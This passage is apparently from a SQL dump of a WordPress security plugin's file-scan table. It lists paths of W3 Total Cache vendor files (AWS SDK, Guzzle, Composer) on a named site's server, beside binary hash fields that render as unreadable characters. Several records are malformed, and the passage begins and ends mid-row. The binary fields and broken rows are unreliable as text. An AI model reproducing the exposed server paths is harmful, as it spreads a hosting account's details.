\'gkգ(','e:ӈr:5\\=S`ˬ','',0,'?'),('Tp>nU*>','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-oidc/2019-06-10/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-oidc/2019-06-10/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qMG','5ĵPD?3g?ω+-؄oݘ','',0,'?'),(';ɮ錙8>','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-oidc/2019-06-10/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-oidc/2019-06-10/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1-?= ','$w1)V`|lAxr2>z7fW','',0,'?'),('4fsHu*','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/states/2016-11-23/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/states/2016-11-23/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7FM+sqS~','ƪkJM7o$2moq/!4E/','',0,'?'),('uᵹӀ3@gx','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/states/2016-11-23/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/states/2016-11-23/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r~Wss@@ K>','ǜ&5lhz#F}&5;$y0J\"','',0,'?'),('Co`3;ր\'u','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/states/2016-11-23/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/states/2016-11-23/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z.mAYF.','am@:f`#%knj٧{u\'8','',0,'?'),('/ sܗ}?L','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/storagegateway/2013-06-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/storagegateway/2013-06-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SJOvnoB','95ySL+F铌@fzQmM','',0,'?'),('(_ kl%<\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/storagegateway/2013-06-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/storagegateway/2013-06-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\0|0KEv+u','Sa\n}5\0hE9suܘ','',0,'?'),(' ?ql\'^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/streams.dynamodb/2012-08-10/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/streams.dynamodb/2012-08-10/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Ń0~\Zc','\" 3mNBOθ]4Wd|\06D5','',0,'?'),('g^iʜtN?.H','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/streams.dynamodb/2012-08-10/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/streams.dynamodb/2012-08-10/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͥiJX]','XL\Z>Č :lMӏ8','',0,'?'),('\0nz\"\Zd1','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sts/2011-06-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sts/2011-06-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÒgM8','œhhr8$F꙰Pf','',0,'?'),('\r\"iiv+W','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sts/2011-06-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sts/2011-06-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jd\'1bۄ','%aٻf7t̲m f\rt3','',0,'?'),(')Ks|lcL{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sts/2011-06-15/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sts/2011-06-15/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c09n4\\h2','M!;X\Z&խH-Lc','',0,'?'),('$myf+,|;?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/support/2013-04-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/support/2013-04-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZoqA','[%isT]̸ ll\\','',0,'?'),('[l&1!b]w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/support/2013-04-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/support/2013-04-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>7q?o(]','8tU;,ER lӮ(0ͻ','',0,'?'),('0C< Q|5b','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/support/2013-04-15/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/support/2013-04-15/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(XPxjv GH','*Vh r\'\'~ihDP({\03','',0,'?'),('|?d\n~3C@ݵ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/swf/2012-01-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/swf/2012-01-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#)?Իl@','V}QxA53zf:\rNG','',0,'?'),('\'] #=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/swf/2012-01-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/swf/2012-01-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B$=\'%̉O.f','A,Ms,`EkG>.~KЛPӴ','',0,'?'),('yp,eջ$','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/synthetics/2017-10-11/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/synthetics/2017-10-11/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ZsːQ','\rw|@c:=!_:@-#','',0,'?'),('=LJ:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/synthetics/2017-10-11/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/synthetics/2017-10-11/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F&t\'g|lj ','8/}/$I6PV\\}MvkUN9','',0,'?'),('vZ4+r8ٯU ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/textract/2018-06-27/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/textract/2018-06-27/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xާ ̓ ft6','E$`r1ibA@NJIm\0aI','',0,'?'),('>ةQА~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/textract/2018-06-27/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/textract/2018-06-27/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!euN?VD','}n[\\\r_p$БM&wB','',0,'?'),('15^ QS\0,,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-query/2018-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-query/2018-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9-waNc8','m6rJ}uNѬoiޫMNQ','',0,'?'),('yMd;sFx','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-query/2018-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-query/2018-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w\rG5|X','+͎Rf۾mQԸF[ՊA57','',0,'?'),('˙iU','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-write/2018-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-write/2018-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dѓn\ZQ[Y,j','Tk[Ս\rTkRG+1o ','',0,'?'),(' zŗ$_pl','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-write/2018-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/timestream-write/2018-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AP:/55c',', ','[~p[wuCQ\n95j','',0,'?'),('p,<@H$U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf/2015-08-24/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf/2015-08-24/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\jYpVsxf\'2','ԅyCNGinY~-j:-ؗ!','',0,'?'),('pJgma','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf-regional/2016-11-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf-regional/2016-11-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' z\'k~b','V5Z\n:YAaC Id *7G','',0,'?'),(',vP~+H \0x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf-regional/2016-11-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf-regional/2016-11-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n\"x8X2-j','J2ϡ>0SYq_uI+&]yb','',0,'?'),('X{2OZ2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf-regional/2016-11-28/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/waf-regional/2016-11-28/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O x2_?x','f|\"m|JeN:K.&\"[1 q.!#','',0,'?'),(']}²Qc\\r{\\1\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wafv2/2019-07-29/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wafv2/2019-07-29/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','姑X[e/K}','T<ATr -Ns쩜m{','',0,'?'),('(z1T+2ޏ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wafv2/2019-07-29/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wafv2/2019-07-29/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u!>zMxs+','Dz +7Si*QlFL','',0,'?'),('N).qJAU-0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wafv2/2019-07-29/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wafv2/2019-07-29/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xv{*؟r','Lxrx!&7+3~oc@y.n','',0,'?'),('\n8tڏ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wellarchitected/2020-03-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wellarchitected/2020-03-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z.a,ue','[0r\\\rP:3GL-wW','',0,'?'),(' w8ƿ]t<','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wellarchitected/2020-03-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/wellarchitected/2020-03-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o񪧷n','AL3Od\r H_;|\rϼY\r*c,q6','',0,'?'),('il0շv.','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/workdocs/2016-05-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/workdocs/2016-05-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ժ\\X!c','lkB~\',dS  , x~q','',0,'?'),('ֹ*Ů`:||++q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/workdocs/2016-05-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/workdocs/2016-05-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\rxwatk= ',' jNc%lƥ{@qhOʓS\\','',0,'?'),('ل^,0z?<#ǟF','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/worklink/2018-09-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/worklink/2018-09-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʹf.(LΣ>','.:v6K_EEl\Z4\"2','',0,'?'),('U?k& k','$ pYYk T&M$Q.a i6','',0,'?'),('y2@$;$','',0,'?'),('R2/\0ΣS5%','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/xray/2016-04-12/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/xray/2016-04-12/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%}A%','< Lї=+YvN;8g\n]5;@K','',0,'?'),('F8Xs4Jb\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/finspace/Exception/finspaceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/finspace/Exception/finspaceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VR52o! ','6՞Ky~z8LLWc','',0,'?'),('\nCmNC/H','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/finspace/finspaceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/finspace/finspaceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڄ)>˚Q%M','ofC`=\0m|:M\nR*>','',0,'?'),('7/@dZx)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I/\06','q7gƗ:z$~G @|;*p\r2','',0,'?'),('(hTk__ ˍtF','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/imagebuilder/Exception/imagebuilderException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/imagebuilder/Exception/imagebuilderException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X(yS˛\"','+Gq','BkM !OI 8\0Ue%s-%','',0,'?'),('{qKPBhKp\nމ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/signer/Exception/signerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/signer/Exception/signerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n4h\'N;]&','=./8FPAmm\"7sƩ ','',0,'?'),('ܹoJ=Puղ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/signer/signerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/signer/signerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"f{DH9@Q','6σГ_\')|RȽ/R','',0,'?'),('nEQJ','wp-content/plugins/w3-total-cache/vendor/bin/jp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/bin/jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/WMp|UF>','/ Z1LJeXhc:+gM','',0,'?'),('KWی;1','wp-content/plugins/w3-total-cache/vendor/composer/ClassLoader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yGM!ex9','!ZgbZFZz |YE ','',0,'?'),('%⚂faa\'.','wp-content/plugins/w3-total-cache/vendor/composer/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('22DPn}DNc\Z','wp-content/plugins/w3-total-cache/vendor/composer/autoload_classmap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T?K˛0','u\\pB|IqGB@\"\\UM n5U','',0,'?'),('%wNvQ','wp-content/plugins/w3-total-cache/vendor/composer/autoload_files.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k A%L[m\Z','ΣѱU+#=RΤ sRH\nR}?A','',0,'?'),('ɂY3z]','wp-content/plugins/w3-total-cache/vendor/composer/autoload_namespaces.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('^ҮZ[.1Wʩ','wp-content/plugins/w3-total-cache/vendor/composer/autoload_psr4.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʅ.74U','(k2=\Z3U.Łs:v8/','',0,'?'),('t TpC}kI','wp-content/plugins/w3-total-cache/vendor/composer/autoload_real.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L4&:','f6,+1 uF3 y>@','',0,'?'),('*Σ8| +','wp-content/plugins/w3-total-cache/vendor/composer/autoload_static.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\"57V>','Nq4y䄙\'(Ϥ?qm{`6e','',0,'?'),('^41=','wp-content/plugins/w3-total-cache/vendor/composer/installed.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Ý\'߸?w','JV>Y3Ho@4 wZyL','',0,'?'),('%Ho^H~^\"','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/.php_cs','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ӧvvJŚ4Ŧ','&G݆3o&0B͠yX{4d','',0,'?'),('|ȨQ&2','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/CHANGELOG.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/CHANGELOG.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M#gȉ6','3KۚbIPM)dLJڙը:w;Eh','',0,'?'),('PڙA','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/Dockerfile','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/Dockerfile',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','í\r\'1','xzv [.4Aٞ2h 1<','',0,'?'),('i>Ç:','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\5@s','T4%syb:)%l%:\'RI','',0,'?'),('y<4|[èfGƱ','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/README.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\xo%i,gr%Eq5','Lhu$Kp(:N̜\nQ','',0,'?'),('-ST5','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/UPGRADING.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/UPGRADING.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{p*&$g*c','L(}N)U2‹W\nZz!~','',0,'?'),('LV smJ0','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/composer.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R@K/G c}','ީ\r#j_(V\rGR ','',0,'?'),('#f-QL_1 >Y','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',': ZPZ?(?','$y>$t 2/\"LPLFSD','',0,'?'),('esSg%It]','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/ClientInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/ClientInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƻsk;8zU9','VژyL\"/r%\"})`','',0,'?'),('@sؚ\'Qbr\\f','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/CookieJar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/CookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ތؒtS',' DZ POAHXibNQ','',0,'?'),('=?Q*Ӏ\"1','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/CookieJarInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/CookieJarInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3_{:','|/y륵$\"ag,ktr','',0,'?'),('=D#Ѳ[ ','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<>$F','\\ I`jYIY?M_(bB(\ny','',0,'?'),(';@,(','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/SessionCookieJar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/SessionCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eK._%I`H','Un$[:QDY#{\\mQ','',0,'?'),('][?:a~','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/SetCookie.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Cookie/SetCookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\Z73YPEJ\\\'\" ','Osb0{\r:< mobF','',0,'?'),('ؙk~G+LL%aN','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/BadResponseException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/BadResponseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~2CLFrTV3','=5I;:URxz~^','',0,'?'),('\'W}','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/ClientException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/ClientException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ѹ\0){pWr ','׃;Z)\"XX⼴n','',0,'?'),('I} ݴX{]p0','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/ConnectException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/ConnectException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L:T©xA|IV','bՕѾ6MwUYʲz','',0,'?'),('CpLeyIMFRu','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/GuzzleException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/GuzzleException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W','@Yu^EFݨҚ,?,|xЈ L','',0,'?'),('ˮBHلV','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/InvalidArgumentException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[H`4u\'cFs','}ƯہO`{+I BLdJ=\" ','',0,'?'),('PfTˎ0d','wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m`dÏܵMP','J3RKȉl1ĹW? bt','',0,'?'),('u%E 